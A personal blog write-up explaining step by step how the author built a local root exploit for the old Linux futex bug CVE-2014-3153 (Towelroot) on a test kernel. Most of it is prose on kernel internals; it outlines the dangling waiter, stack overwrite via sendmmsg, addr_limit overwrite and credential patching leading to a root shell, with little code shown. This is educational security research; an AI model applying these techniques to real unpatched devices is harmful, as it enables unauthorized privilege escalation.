Exploiting CVE-2014–3153 (Towelroot)

Elon Gliksberg
20 min readJan 8, 2021

Originally published at https://elongl.github.io on January 8, 2021.

For quite some time now, I’ve been wanting to unveil the internals of modern operating systems.
I didn’t like how the most basic and fundamental level of a computer was so abstract to me,
and that I did not truly grasp how some of it works, a “black-box”.

I’ve always been more than familiar with kernel and OS concepts,
but there’s a big gap from comprehending them as a user versus a kernel hacker.
I wanted to see code, not words.

In order to tackle that, I decided to take on a small kernel exploit challenge, and in parallel read Linux Kernel Development. Initially, the thought of reading the kernel’s code seemed a bit spooky, “I wouldn’t understand a thing”. Little by little, it wasn’t as intimidating, and honestly, it turned out to be quite easier than I expected.

Now, I feel tenfolds more comfortable to simply look something up in the source in order to understand how it works, rather than searching man pages endlessly or consulting other people.

The book was really nice and all, but I wanted to get my hands dirty.
I searched for a disclosed vulnerability within the Linux kernel,
my plan being that I’d read its flat description and develop my own exploit to it.
A friend recommended CVE-2014–3153, also known as Towelroot, and I just went for it.
Back in the days, it was very commonly used in order to root Android devices.

The vulnerability is based around a mechanism called Futex within the kernel.
Futex being a wordplay on Fast userspace Mutex.

The Linux kernel provides futexes as a building block for implementing userspace locking.
A Futex is identified by a piece of memory which can be shared between processes or threads. In its bare form, a Futex is a counter that can be incremented and decremented atomically and processes can wait for its value to become positive.

Futex operation occurs entirely in userspace for the noncontended case.
The kernel is involved only to arbitrate the contended case.
Lock contention is a state where a thread attempts to acquire a lock that is already held by another thread.

The futex() system call provides a method for waiting until a certain condition becomes true. It is typically used as a blocking construct in the context of shared-memory synchronization. When using futexes, the majority of the synchronization operations are performed in user space. A user- space program employs the futex() system call only when it is likely that the program has to block for a longer time until the condition becomes true. Other futex() operations can be used to wake any processes or threads waiting for a particular condition.

I will cover only the terms and concepts related to the exploitation.
For a more profound insight about futexes, please reference man futex(2) and man futex(7).
I strongly suggest messing around with the examples in order to assess your understanding.

The futex() syscall isn't typically used by "everyday" programs, but rather by system libraries such as pthreads that wrap its usage. That's why the syscall doesn't have a glibc wrapper like most syscalls do. In order to call it, one has to use syscall(SYS_futex, ...).

Due to the blocking nature of futex() and it being a way to synchronize between different tasks,
you'd notice how there's a lot of dealing with threads within the exploit which can get slightly confusing unless approached slowly.

There are two core concepts to understand about futexes in general which we’d talk a lot about.

The first is something’s called a waiters list, also known as the wait queue.
This term refers to the blocking threads that are currently waiting for a lock to be released.
It is held in kernelspace and programs can issue syscalls to carry out operations on it. For instance, attempting to lock a contended lock would result in an insertion of a waiter, releasing a lock would pop a waiter from the list and reschedule its task.

The second is that there are two kinds of futexes: PI & non-PI.
PI stands for Priority Inheritance.

Priority inheritance is a mechanism for dealing with the priority-inversion problem. With this mechanism, when a high- priority task becomes blocked by a lock held by a low-priority task, the priority of the low-priority task is temporarily raised to that of the high-priority task, so that it is not preempted by any intermediate level tasks, and can thus make progress toward releasing the lock.

This introduces the ability to prioritize waiters among the futex’s waiters list.
A higher-priority task is guaranteed to get the lock faster than a lower-priority task.
Unlike non-PI operations, for instance.

FUTEX_WAKE
This operation wakes at most val of the waiters that are waiting (e.g., inside FUTEX_WAIT) on the futex word at the address uaddr. Most commonly, val is specified as either 1 (wake up a single waiter) or INT_MAX (wake up all waiters). No guarantee is provided about which waiters are awoken (e.g., a waiter with a higher scheduling priority is
not guaranteed to be awoken in preference to a waiter with a lower priority).

Both non-PI and PI futex types are used within the exploit.
The way PI futexes are implemented is using what’s called in the kernel a plist, a priority-sorted list.
If you don’t know what it is, you could take a look here, though this image sums it up perfectly.

All images are copied from Appdome.

Here’s the CVE description.

The futex_requeue function in kernel/futex.c in the Linux kernel through 3.14.5 does not ensure that calls have two different futex addresses, which allows local users to gain privileges via a crafted FUTEX_REQUEUE command that facilitates unsafe waiter modification.

Let’s break it down.
First, we need to understand what’s a requeue operation in the context of futexes.
A waiter, blocking thread, that is contending on a lock, can be “requeued” by a running thread to be told to wait on a different lock instead of the one that it currently waits on.

A waiter on a non-PI futex can be requeued to either a different non-PI futex, or to a PI-futex.
A waiter on a PI-futex cannot be requeued.
The bug itself is that there are no validations whatsoever on requeuing from a futex to itself.

This allows us to requeue a PI-futex waiter to itself, which clearly violates the following policy.

FUTEX_CMP_REQUEUE_PI
Requeues waiters that are blocked via FUTEX_WAIT_REQUEUE_PI on uaddr from a
non-PI source futex (uaddr) to a PI target futex (uaddr2).

Take a look at the bug fix commit, both the description and the code changes.

Though, what actually happens when you requeue a waiter to itself? Good question.

Before actually diving into the exploit, I decided to provide a rough overview of how it works for context further on. Eventually, what this bug gives us is a dangling waiter within the futex’s waiters list. The way the exploit does that is as follows:

And now we’ll understand why this results in a dangling waiter.

There are a lot of different data types within the Futex’s implementation code,
in order to cope with that I made somewhat of a summary of them to help me keep track of what’s going on. Feel free to use it as needed.

Step 1

We start off by locking the PI-futex. We do that because we want the first requeue (step 3) to block and create a waiter on the waiters list, rather than acquire the lock immediately. That waiter is destined to be our dangling waiter later on in the exploit.

Step 2

In order to requeue a waiter from a non-PI -> PI futex, we first have to invoke FUTEX_WAIT_REQUEUE_PI on the non-PI futex, which in turn translates to thefutex_wait_requeue_pi() function.
What this function does is take a non-PI futex and wait ( FUTEX_WAIT) on it, and a PI-futex that it can potentially be requeued to with a FUTEX_CMP_REQUEUE_PI command later on.

The function defines various local variables, the most important of which is the rt_waiter variable.
Unsurprisingly, this variable is our waiter.

It contains the lock that it waits on, it holds references to other waiters in the waiters list through the list_entry plist node, and on top of that it also has a pointer to the task that it currently blocks.

Needless to say that the locals are placed on the kernel stack, but also worth mentioning that because it’ll be crucial to understand in the near future.

Later on, it initializes the futex queue entry and enqueues it.

Note how it sets the requeue_pi_key to the futex key of the target futex.
This is part of what allows us to self-requeue. We'll see this in the final step.

At this point in the code, the function simply blocks and does not continue unless:

  1. A wakeup occurs.
  2. The process is killed.

Step 3

Next up, futex_requeue() is called by the FUTEX_CMP_REQUEUE_PI operation in another thread in order to do the heavy lifting of actually requeuing the waiter. This is the vulnerable and most important function in the exploit. The function is fairly long and therefore I'm not going to review all of its logic, and rather only address the relevant parts.
I do encourage you to brief over it and try to get a hold of what it does.

Let’s quickly glance at the code that requeues the waiter at rt_mutex_start_proxy_lock().

And inside task_blocks_on_rt_mutex().

Now, rt_waiter of futex_wait_requeue_pi() is a node in the waiters list of our PI futex.

Step 4

Here we’ll set the userspace value of the futex, also known as the futex-word, to 0.
This is vital so that when the self-requeuing occurs, the call tofutex_proxy_trylock_atomic() will succeed and wake the top waiter of the source futex, which is in fact the same as the destination futex. The problem arises when we have a waiter in the waiters list whose thread we can wake up without forcing its deletion from the waiters list.

It might seem confusing at first but it’ll clear up in the next step.

Step 5

On this step, we’ll requeue the PI futex waiter to itself and invoke futex_requeue() once again.

Let’s take a look at futex_proxy_trylock_atomic() this time.

Pay attention to how it ensures that the requeue_pi_key of the top_waiter is equal to the requeue's target futex's key. This is why we need to self-requeue, and why it wouldn't be sufficient to just set the value of a different futex in userspace to 0 and requeue to it.

So the requirements for triggering the bug are:

  1. The target futex from the futex_wait_requeue_pi() remains.
  2. There’s a waiter that is actively contending on the source futex.

The only scenario that meets both these terms is a self-requeue.

Other than that, basically all it does is call futex_lock_pi_atomic() and if the lock was acquired,
wake up the top waiter of the source futex.

The function attempts to atomically compare-and-exchange the futex-word. It compares it to 0 which is the value that signals the lock is free and exchanges it with the task's PID.

This operation is unlikely to succeed because the user could've done it in userspace and avoid the expensive syscall, therefore the assumption is that the user wasn't able to retrieve the lock in userspace and needed the kernel's "help". That's why it would be a "surprise" in case it was able to get the lock.

Recalling the function above, if we successfully took control of the lock, we’d wake the top waiter, which is the waiter that was added to the waiters list on the first requeue (step 3).
Because we overwrote the value in userspace (step 4), the function succeeds and wakes the waiter.

When futex_requeue() wakes up the waiter, it sets the rt_waiter to NULL in order to signal futex_wait_requeue_pi() that the atomic lock acquisition was successful.

Its usage is seen here within futex_wait_requeue_pi().

And as we can see, rt_mutex_finish_proxy_lock() is not being called since rt_waiter is NULL, and therefore the waiter is kept as-is within the waiters list.

Recap

We start off by locking a PI-futex. Then we simply requeue a thread to it which creates a waiter entry on the futex’s waiters list. Afterwards, we overwrite the futex-word with 0. Once we'll requeue the waiting thread onto itself, the attempt to atomically own the lock and wake the top waiter on the source (which is also the destination) futex succeeds.

This leaves us with a dangling waiter on the waiters list whose thread has continued and is up and running. Now, the waiter entry points to garbage kernel stack memory. The original rt_waiter is long gone and was destroyed by other function calls on the stack.

Our waiter, a node in the waiters list, is now completely corrupted.

I won’t go too in depth as to how I built the kernel, since there are a milion of tutorials out there on how to do that. I’d merely state that I’ve been using an 3.11.4-i386 kernel for this exploit that I compiled on a Xenial (Ubuntu 16.04) Docker container.

The only actual hassle was getting my hands on the right gcc version for the according kernel version that I worked on. I compared the GCC releases with the Linux kernel version history and tried various versions that seemed to fit by release date. Ultimately gcc-5 was what did the job for me.

It would be virtually impossible to do all of that without building your own kernel. The ability to debug the code and add your own logs within the code is indescribable.

For actually running the kernel, I’ve used QEMU as my emulator.

Now’s the time for the actual fun.

Eventually, our goal would be to escalate to root privileges.
The way we'd do that is by achieving arbitrary read & write within the kernel's memory, and then overwrite our process' struct which dictates the security context of a task.

The most fundamental members of cred are presumably the real uid and gid, but it also stores other properties such as the task's capabilities and many other.

Although how would we go about it by solely having a wild reference to that waiter?
Quite frankly, the idea is fairly simple. There’s nothing new about corrupting a node within a linked list in order to gain read and write capabilities. Same applies here. We’d need to find a way to write to that dangling waiter, and then perform certain operations on it so that the kernel would do as we please.

Kernel Crash

But let’s start small. For now we’ll just attempt to crash the kernel.

I wrote a program that implements the steps that we listed above.
Let’s analyze it before going into the actual exploitation. Here’s the code.

The flock, fwait_requeue, and the frequeue functions are implemented in a small futex wrappers file that I've created for simplification and ease on the eyes.

We start off by allocating sizeof(uint32_t) * 2 of R/W memory which is our two futexes.
Mind the MAP_SHARED flag that is being passed to mmap call in order to signal that the memory needs to be shared among the main process and the process that is spawned from the fork() call.

Side-comment: In the actual exploit you’d see that I’m using pthreads rather than fork() which makes the code much clearer, and there's no need to map a shared address space since all threads point to the same virtual address space.

Now let’s see this in action.

If you paid attention to the call trace, you would spot that the kernel crashes once the process itself terminates ( do_exit). What happens is that the kernel attempts to cleanup the process' resources ( mm_release), specifically the PI state list ( exit_pi_state_list), and when it attempts to do so, it unlocks all the futexes that the process holds. During the process of releasing them, the kernel tries to unlock our corrupted waiter as well which causes a crash.

To be more accurate, it occurs here.

The function compares the lock that the top waiter claims it waits on to the actual lock. Because the waiter is completely bugged, it’s lock member no longer points to the relating rt_mutex and therefore causes a crash.

DOSing the system is pretty cool, but let’s make it more interesting by escalating to root privileges.

I intentionally do not post the entire exploit in advance because that would most likely be too overwhelming. Instead, I’ll append code blocks by stages.
If you do prefer to have the entire exploit available in hand, it can be found here.

Writing To The Waiter

In order to make use of our dangling waiter, we’d first need to find a way to write to it.
A quick reminder, our waiter is placed on the kernel stack. With that in mind, we need to somehow be able to write a controlled buffer to the place the waiter was held within the stack. Given that we’re just a userspace program, our way of writing data to the kernel’s stack is by issuing System Calls.

But how do we know which syscall to invoke?
Luckily for us, the kernel comes with a useful tool called checkstack.
It can be found within the source under scripts/checkstack.pl.

The script lists the stack depth, size of stack frame, of each function within the kernel. This would help us in estimating which syscall we should use in order to write to the waiter’s address space.

We enforce two limitations on the system call we’re looking for.

  1. It is deep enough in order to overlap with our dangling rt_waiter.
  2. The local variable within the function that overlaps rt_waiter is controllable.

The syscalls sendmsg, recvmsg, and sendmmsg are the adjacent functions to futex_wait_requeue_pi in terms of stack usage.
That should be a good place to start. We'll be using sendmmsg throughout the exploit.

I set two breakpoints, at futex_wait_requeue_pi() and ___sys_sendmsg() in order to understand what arguments should we pass to the sendmmsg syscall so that rt_waiter is under our control.

When the breakpoint hits on futex_wait_requeue_pi(), I do nothing besides storing the address of rt_waiter in $waiter. When it hits on___sys_sendmsg(), I check for the address of the local variable iovstack, which is of type struct iovec[8], and examine its size.

Proved futex_wait_requeue_pi:rt_waiter overlaps with ___sys_sendmsg:iovstack.

Let’s take a look at sendmmsg 's signature.

At this point I suggest understanding the syscall itself.

The sendmmsg() system call is an extension of sendmsg(2) that allows the caller to transmit multiple messages on a socket using a single system call. (This has performance benefits for some applications.)

The arguments are pretty trivial and essentially the same as sendmsg only that there's mmsghdr that can contain multiple msghdr.
If you're unfamiliar with the syscall, give it a read atman sendmmsg(2).

In order to invoke sendmmsg successfully, we'd need a pair of connected sockets that we can send the data to. It is very important to understand that we want___sys_sendmsg() to block so that we can take advantage of the waiter's corrupted state while it's under our control.

Typically, the function sends the data over the socket and exits. In order to make it block, we’d need to use SOCK_STREAM as our socket type which provides a reliable connection-based byte stream. This grants us the blocking capabilities we've talked about. On top of that, we'd need to fill up the "send buffer" so that data can't be sent over the socket, unless data is read on the other end.

I’ve crafted a function that does just that.

The function creates a pair of UNIX sockets of type SOCK_STREAM and then sends AAAAAAAA over the socket untill the call to send fails with EWOULDBLOCK as the errno. Note the MSG_DONTWAIT flag that makes the send return immediately instead of blocking.

MSG_DONTWAIT
Enables nonblocking operation; if the operation would block, EAGAIN or EWOULDBLOCK is returned.

Afterwards we assert that EWOULDBLOCK is in fact the reason the operation failed.

Next up, we’re ready for actually invoking our sendmmsg to overwrite rt_waiter. Exciting!

For the sake of overwriting the waiter’s list entries properly, which is what we’re interested in, we’d need to align the iovstack in kernelspace, which is the iovec in userspace accordingly.

In this function I setup the messages, the iovec, in the hope that it would overwrite the waiter's struct once I call sendmmsg. Once again, I've placed two breakpoints atfutex_wait_requeue_pi() and ___sys_sendmsg().

There are many interesting things to look at from this experiment. Let’s go over it.

Just as before, I store rt_waiter's address. Upon ___sys_sendmmsg I continue the execution until the function is about to exit. However, because the function is blocking, I have to interrupt the debugger with a^C. Once the function blocks, it had already filled the iovstack. After I do that, I browse the waiter struct and I see that the overwrite occured just as I wanted it to.

(In reality there’s only a single waiter)

That’s great! We can now overwrite the dangling waiter’s memory.

Let’s review this as a whole within the the exploit code.

We’ve already reviewed setup_msg(), setup_sockets(), and fwait_requeue() would block until the self-requeue is triggered. First thing when it exits, sendmmsg() is called to overwrite the waiter, which also blocks.

You could see that I create another thread called ref_holder which also attempts to lock pi_futex which in turns forms another waiter instance. The reason this is needed is because the state of the futex would get destroyed if there aren't any contending waiters on the lock.

Our next goal would be to leak an address that would help us target the task_struct of our process which contains its so that we can overwrite it later to gain root privileges.

The way we go about doing it is using a fake waiter and when we’d attempt to lock the futex once again, another waiter would be added to the waiters list which would result in writing to the adjacent nodes which would be under our control. Once that happens, we’d be able to inspect the kernel address from userspace via the fake waiter list nodes.

Let’s first address what’s called a “Thread Info”.
thread_info is a thread descriptor that is held within the kernel and is placed on the stack's address space. For each thread that we create using pthread_create() a new thread_info is generated in the kernel.

The reason it interests us is because it’s relatively easy to get its address once you have a leak, and the more interesting reason is that it contains a pointer to the process’ task_struct. Just to clarify, a newtask_struct is also created for each thread.

In order to do the actual leak, we link together two fake waiters. One is named fake_waiter which is used for general list corruption, and the other is called leaker_waiter because its sole usage is to leak addresses through.

By linking I mean in practice that we set the previous node of the fake_waiter to be the leaker_waiter, and set its priority to be the default priority of a task plus one so that it'll place itself after the leaker_waiter. Priority is a value that correlates to the process' niceness.

Those aren’t the actual priorities but the idea remains.

After we’ve linked the waiters in userspace, we call lock_pi_futex() on another thread so that a waiter is created which attempts to add itself into the list. Naturally, once a node is added into a list, it writes to its adjacent nodes, in our case to leaker_waiter.

Awesome! We’ve leaked a kernel stack address of one of the threads in our program.

In order to target its thread_info, all we have to do is AND its address with THREAD_INFO_BASE. You can see that fromcurrent_thread_info()'s implementation, though that might vary across different architectures. Here's the source for x86.

We have a hold of the thread_info location in memory.

Just as we can read by corrupting the list, we can utilize the same technique in order to use it for writing purposes. The first memory area that we’ll be targeting is what’s called the “Address Limit”.

It lays under thread_info.addr_limit as you can see in thread_info above. It is used for limiting the virtual address space that is reserved for the user. When the kernel works with user-provided addresses, it compares them to the thread's addr_limit in order to verify that it's a valid userspace address. If the supplied address is smaller than addr_limit, the designated memory area is in fact from userspace.

The addr_limit is an excellent target for initial kernel overwrite because once you overwrite it with 0xffffffff, you have gotten full arbitrary read and write capabilities to kernel memory.

After we’ve executed leak_thread_info(), we're going to call escalate_priv(). The first thing that it does is registerescalate_priv_sighandler as the SIGINT signal handler using the syscall.

Let’s briefly mention what signal handlers are and why do we use them. A signal handler is a function that is called by the target environment when the corresponding signal occurs. The target environment suspends execution of the program until the signal handler returns.

This mechanism allows us to interrupt the process’ job in order to perform some other work. In our case, we’d like to form the kernel stack in a certain way and also be able to execute a piece of code on the same thread. However, in order to arrange the stack we have to perform a blocking operation because otherwise our arrangement would be overwritten, but if you block you can’t exploit the stack’s state.

That’s why signal are needed and why they’re used in our scenario. They allow us to execute code within the process’ context outside its normal execution flow.

I’m reminding you that when talking about pthreads, all the signal handlers are shared with the parent process, that is because internally pthreads passes both CLONE_THREAD | CLONE_SIGHAND flags when it creates the child process with .

CLONE_THREAD
The flags mask must also include CLONE_SIGHAND if CLONE_THREAD is specified.

Afterwards, we’re going to place the address that we want to write to, that is &corrupter_thread_info->addr_limit, as the fake waiter's previous node. Once we'll attempt to lock the futex, the newly created waiter would write its own address to the addr_limit. Not yet something that we can control, but rather a value that is guaranteed to be bigger than the current one because addr_limit is at the bottom-most of the virtual address space.

Now we’ve arrived to a scenario where addr_limit > &addr_limit is surely true. Once this is condition is met, we can simply write to addr_lmit once again on our own! This is where the signaling come into play, and specifically theescalate_priv_sighandler from earlier.

Because each thread has its own thread_info, which in turn means that each thread also has its own addr_limit, we'd need a way to interrupt the specific thread whose addr_limit we've overwritten. Therefore, after we've "increased" the address limit, only that thread would be able to utilize and exploit this feature. This is where we signal the addr_limit_writer thread using pthread_kill() which triggers the execution of escalate_priv_sighandler.

What this function does is read and write to different areas in kernel memory. In order to do it, I wrote a small helper function called . It exploits the fact that addr_limit had been overwritten, it creates a pipe which it reads from and writes to. The read() and write() syscalls internally invoke copy_from_user() and copy_to_user() within the kernel which do the checks according to addr_limit.

At the signal handler several operations are done.

  1. Cancel the address space access limitation by setting addr_limit to the highest value possible.
  2. Read the task_struct pointer of the corrupted thread.
  3. Read the parent’s task_struct pointer from the corrupted thread's task_struct via the group_leader member which points to it.
  4. Read the struct pointer from the parent’s task_struct.
  5. Overwrite all the identifiers (uid, gid, suid, sgid, etc.) of the main struct.

Now all that’s left to do is system("/bin/sh") on the main thread to drop a shell.
Because the child process inherits the struct, the shell will also be in root permissions.

This has been a lot of fun, and I’ve learned so much on the way.
I got to have the interaction I desired with the kernel, working with it and understanding how it works a bit better. Needless to say, there’s an infinite amount of knowledge to be gathered, but that’s a small step onwards. At the end, the exploit seems relatively short, but the truly important part is getting there and being able to solve the puzzle.

The full repository can be found here.

If you have any questions, feel free to contact me and I’ll gladly answer.
Hope you enjoyed the read. Thanks!

Special thanks to Nspace who helped throughout the process.

--

--